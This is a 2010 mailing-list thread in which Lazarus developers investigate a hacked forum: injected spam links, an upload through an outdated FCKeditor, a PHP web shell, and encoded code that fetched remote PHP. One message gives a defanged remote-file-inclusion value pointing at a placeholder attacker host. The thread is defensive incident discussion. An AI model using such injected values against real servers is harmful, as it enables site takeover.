Re: [Lazarus] Lazarus Forum seems to be hacked!
they've either fixed the one on the forums already or my blocking of ohloh.net has possibly prevented it... there has been a recent rash of mess getting into numerous places... one that has been rather unnerving has been where an iframe (IIRC) was put in place with a Z axis of the highest numerical entity that made it appear that all content was removed and replaced by the ad being shoved in... testing www.lazarus.freepascal.org shows me the exact same page as forums.lazarus.freepascal.org... and neither carry the "index.php?action" item in my testing... On 1/26/2010 21:20, Marcelo B de Paula wrote: Hi there, The Lazarus forum (http://forum.lazarus.freepascal.org/index.php?action=forum) is >very, very slow ATM, it takes me > 1 minute to load a page (tested on different systems, with different OS'es and different >browsers). When I viewed the source I discovered > 1000 lines (after the >normal code for the page) like: hp printers can use xp and windows 7 http://www.saleschampions2006.org/store/windows-xp/hp-pri>nters---can--use-xp-and-windows-7.php">hp printers can use xp and windows 7 Same here, but in main page http://www.lazarus.freepascal.org Marcelo. -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
For the record, the lazarus site's SMF installation is out of date (by 1 version), I'd recommend patching it up. I love SMF's upgrade process... so simple. On Tue, Jan 26, 2010 at 10:15 PM, waldo kitty wrote: > > they've either fixed the one on the forums already or my blocking of > ohloh.net has possibly prevented it... there has been a recent rash of > mess getting into numerous places... one that has been rather unnerving has > been where an iframe (IIRC) was put in place with a Z axis of the highest > numerical entity that made it appear that all content was removed and > replaced by the ad being shoved in... > > testing www.lazarus.freepascal.org shows me the exact same page as > forums.lazarus.freepascal.org... and neither carry the "index.php?action" > item in my testing... > > > On 1/26/2010 21:20, Marcelo B de Paula wrote: > >> Hi there, >>> >>> The Lazarus forum >>> (http://forum.lazarus.freepascal.org/index.php?action=forum) is >very, >>> very slow ATM, it takes me > 1 minute to load a page (tested on >>> different systems, with different OS'es and different >browsers). >>> >>> When I viewed the source I discovered > 1000 lines (after the >normal >>> code for the page) like: >>> >>> hp printers can use xp and >>> windows 7 >> href="http://www.saleschampions2006.org/store/windows-xp/hp-pri >>> >nters---can--use-xp-and-windows-7.php">hp >>> >>> printers can use xp and windows 7 >>> >> >> Same here, but in main page http://www.lazarus.freepascal.org >> >> Marcelo. >> >> >> -- >> ___ >> Lazarus mailing list >> Lazarus@lists.lazarus.freepascal.org >> http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus >> >> > > -- > ___ > Lazarus mailing list > Lazarus@lists.lazarus.freepascal.org > http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus > -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
27.01.2010 11:50, Matt Shaffer пишет: For the record, the lazarus site's SMF installation is out of date (by 1 version), I'd recommend patching it up. I love SMF's upgrade process... so simple. Not when you have some mods which conflicts with the new version install. Best regards, Paul Ishenin. -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
It seems to be fine again now. However, at the very bottom of th indexpage I find: Loading... Does this really belong there? Bart -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Matt Shaffer wrote: For the record, the lazarus site's SMF installation is out of date (by 1 version), I'd recommend patching it up. I love SMF's upgrade process... so simple. The "infection" is removed. We're currently investigating where it came from. The smf forum was uptodate (1.1.11). Unfortunately when restoring things, a previous index.php was used, which reports the older version. (which is the only diff of the file) I fear the ease of the update process made it also possible to write new contents. Marc -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink wrote: > > The "infection" is removed. We're currently investigating where it came > from. > The smf forum was uptodate (1.1.11). Unfortunately when restoring things, > a previous index.php was used, which reports the older version. (which is > the only diff of the file) > > I fear the ease of the update process made it also possible to write new > contents. > > Marc > > I don't see how the ease of the update process would give hackers an advantage... after all, you still have to have an admin account to perform that activity. Keep in mind: 1. An outdated index.php could be a possible culprit, if it had any security vulnerabilities with it (although I highly doubt this) 2. Any mods installed may have vulnerabilities 3. If the person updating the forum to 1.1.11 ignored warning messages about files not being writable, etc, there may still be an outdated file with a vulnerability from 1.1.10 4. SMF doesn't necessarily have to be the culprit. Exploits in other software may have given the intruder file/ftp access, allowing him to change any files anywhere. -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Matt Shaffer wrote: On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink mailto:marc.weust...@cuperus.nl>> wrote: The "infection" is removed. We're currently investigating where it came from. The smf forum was uptodate (1.1.11). Unfortunately when restoring things, a previous index.php was used, which reports the older version. (which is the only diff of the file) I fear the ease of the update process made it also possible to write new contents. Marc I don't see how the ease of the update process would give hackers an advantage... after all, you still have to have an admin account to perform that activity. It requires the smf dir and file to be writable for the user the forum is runnng on. Which means that any leak can write to these files. Keep in mind: 1. An outdated index.php could be a possible culprit, if it had any security vulnerabilities with it (although I highly doubt this) Is up to date 2. Any mods installed may have vulnerabilities We don't have many mods 3. If the person updating the forum to 1.1.11 ignored warning messages about files not being writable, etc, there may still be an outdated file with a vulnerability from 1.1.10 We were up to date without any warning. 4. SMF doesn't necessarily have to be the culprit. Exploits in other software may have given the intruder file/ftp access, allowing him to change any files anywhere. there is no public external access to that machine. No shell, no ftp. only web. Marc -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Well, there doesn't have to be shell/ftp for the person to have access to files ;) As long as they're able to upload their own file manager through an exploit... Anyway, I can't think of any other possibilities. But, wouldn't it be possible to change the permissions of SMF's files when an update is needed, and then changing the permissions back to read only? Granted, this could be limiting and is certainly annoying, but it's better than having the forums hacked to pieces. On Wed, Jan 27, 2010 at 5:04 PM, Marc Weustink wrote: > Matt Shaffer wrote: > > On Wed, Jan 27, 2010 at 10:37 AM, Marc Weustink > > marc.weust...@cuperus.nl>> wrote: >> >>The "infection" is removed. We're currently investigating where it >>came from. >>The smf forum was uptodate (1.1.11). Unfortunately when restoring >>things, a previous index.php was used, which reports the older >>version. (which is the only diff of the file) >> >>I fear the ease of the update process made it also possible to write >>new contents. >> >>Marc >> >> I don't see how the ease of the update process would give hackers an >> advantage... after all, you still have to have an admin account to perform >> that activity. >> > > It requires the smf dir and file to be writable for the user the forum is > runnng on. Which means that any leak can write to these files. > > > Keep in mind: >> 1. An outdated index.php could be a possible culprit, if it had any >> security vulnerabilities with it (although I highly doubt this) >> > > Is up to date > > > 2. Any mods installed may have vulnerabilities >> > > We don't have many mods > > > 3. If the person updating the forum to 1.1.11 ignored warning messages >> about files not being writable, etc, there may still be an outdated file >> with a vulnerability from 1.1.10 >> > > We were up to date without any warning. > > > 4. SMF doesn't necessarily have to be the culprit. Exploits in other >> software may have given the intruder file/ftp access, allowing him to change >> any files anywhere. >> > > there is no public external access to that machine. No shell, no ftp. only > web. > > > Marc > > -- > ___ > Lazarus mailing list > Lazarus@lists.lazarus.freepascal.org > http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus > -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
On 1/27/2010 16:10, Matt Shaffer wrote: Keep in mind: 1. An outdated index.php could be a possible culprit, if it had any security vulnerabilities with it (although I highly doubt this) 2. Any mods installed may have vulnerabilities 3. If the person updating the forum to 1.1.11 ignored warning messages about files not being writable, etc, there may still be an outdated file with a vulnerability from 1.1.10 4. SMF doesn't necessarily have to be the culprit. Exploits in other software may have given the intruder file/ftp access, allowing him to change any files anywhere. and just to add to this and expand on my comment that i made earlier about frames with extremely high Z axis numbers... those that have been seen, caught and analyzed were done with postings in the forums where they happened... none of the content was actually messed with... the high Z axis number just ensured that that content was over the top of all other and made it appear that everything was done... -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Matt Shaffer schrieb: > Well, there doesn't have to be shell/ftp for the person to have access > to files ;) To ssh, you've to hack a vpn first ;) -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Right, but what I meant was if someone manages to upload their own PHP file to the lazarus server, they can easily have uploaded a PHP file manager which has the capability of deleting files, etc, without ever needing ssh/ftp (this assumes the attack was done through a vulnerable piece of software, that had write permissions, etc.) I don't think this scenario is extremely likely. On Thu, Jan 28, 2010 at 2:42 AM, Florian Klaempfl wrote: > Matt Shaffer schrieb: > > Well, there doesn't have to be shell/ftp for the person to have access > > to files ;) > > To ssh, you've to hack a vpn first ;) > > -- > ___ > Lazarus mailing list > Lazarus@lists.lazarus.freepascal.org > http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus > -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Matt Shaffer wrote: Right, but what I meant was if someone manages to upload their own PHP file to the lazarus server, they can easily have uploaded a PHP file manager which has the capability of deleting files, etc, without ever needing ssh/ftp (this assumes the attack was done through a vulnerable piece of software, that had write permissions, etc.) I don't think this scenario is extremely likely. This is probably what happened. As I see now, together with tinyportal comes an outdated FCKeditor. This editor has known issues. The file manager in this editor has access to some tp subdir where we found a php "filemanager" through which you could upload files to the whole site. This way some "buy-your-software-here" webshop got installed and then managed added a piece of encoded php to index.php. What this encoded piece did was access a remote server, which in its turn returned a piece of php which got executed. This piece of php accesses our or similar webshops to generate traffic. This last part made browsing the site slow. At this moment the FCKeditor is disabled and removed. Marc -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
Was the php shell C99madshell? It seems many sites have been recently compromised via this shell. The ways the shell is uploaded depends on the vulnerabilities of the forum software. Marc Weustink wrote: Matt Shaffer wrote: Right, but what I meant was if someone manages to upload their own PHP file to the lazarus server, they can easily have uploaded a PHP file manager which has the capability of deleting files, etc, without ever needing ssh/ftp (this assumes the attack was done through a vulnerable piece of software, that had write permissions, etc.) I don't think this scenario is extremely likely. This is probably what happened. As I see now, together with tinyportal comes an outdated FCKeditor. This editor has known issues. The file manager in this editor has access to some tp subdir where we found a php "filemanager" through which you could upload files to the whole site. This way some "buy-your-software-here" webshop got installed and then managed added a piece of encoded php to index.php. What this encoded piece did was access a remote server, which in its turn returned a piece of php which got executed. This piece of php accesses our or similar webshops to generate traffic. This last part made browsing the site slow. At this moment the FCKeditor is disabled and removed. Marc -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus . -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
patspiper wrote: Was the php shell C99madshell? Nope: ws.php -> #Web Shell by oRb Marc -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
On 1/28/2010 02:42, Florian Klaempfl wrote: Matt Shaffer schrieb: Well, there doesn't have to be shell/ftp for the person to have access to files ;) To ssh, you've to hack a vpn first ;) why? MitM setups aren't that hard... i know of at least one chat proxy package that does this so as to allow for monitoring of chats and file exchanges as well as injecting "you are being monitored" and similar messages into the chat stream... yes, this is mostly a corporate and home use but it is still easy enough to to do and no "hacking" necessary :P -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
On 1/28/2010 02:55, Matt Shaffer wrote: Right, but what I meant was if someone manages to upload their own PHP file to the lazarus server, they can easily have uploaded a PHP file manager which has the capability of deleting files, etc, without ever needing ssh/ftp (this assumes the attack was done through a vulnerable piece of software, that had write permissions, etc.) I don't think this scenario is extremely likely. what is there to upload? all it takes is a var that is not properly sanitized that references a shell script on another site which then executes in the context of the server with the bad code... this is all too common an occurrence as my IDS shows on my practically invisible site... this isn't sql injection or anything like that but simply stuffing a POST or GET var with something like "hxxp://bad.domain.tld/shell_script" and having the code actually get it and execute it... proper sanitizing of ALL vars, whether user input or "hidden" must be done in any web application to ensure that what is being received is valid for the application... -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
On 1/28/2010 12:17, patspiper wrote: Was the php shell C99madshell? It seems many sites have been recently compromised via this shell. The ways the shell is uploaded depends on the vulnerabilities of the forum software. my point that i just tried to make in a (very) recent post is that this type of c4rp would not happen if the vars passed in the GET and POST were properly sanitized ;) FWIW: it doesn't matter which shellcode was used as long as any shellcode can be pulled from a remote site via an unsanitized var... -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
Re: [Lazarus] Lazarus Forum seems to be hacked!
waldo kitty wrote: my point that i just tried to make in a (very) recent post is that this type of c4rp would not happen if the vars passed in the GET and POST were properly sanitized ;) FWIW: it doesn't matter which shellcode was used as long as any shellcode can be pulled from a remote site via an unsanitized var... It is not only a matter of sanitizing GET and POST vars. The php shell could be uploaded as an avatar (an image) and executed if no proper safeguards are taken to prevent that. And this is just one example of vulnerabilities. -- ___ Lazarus mailing list Lazarus@lists.lazarus.freepascal.org http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
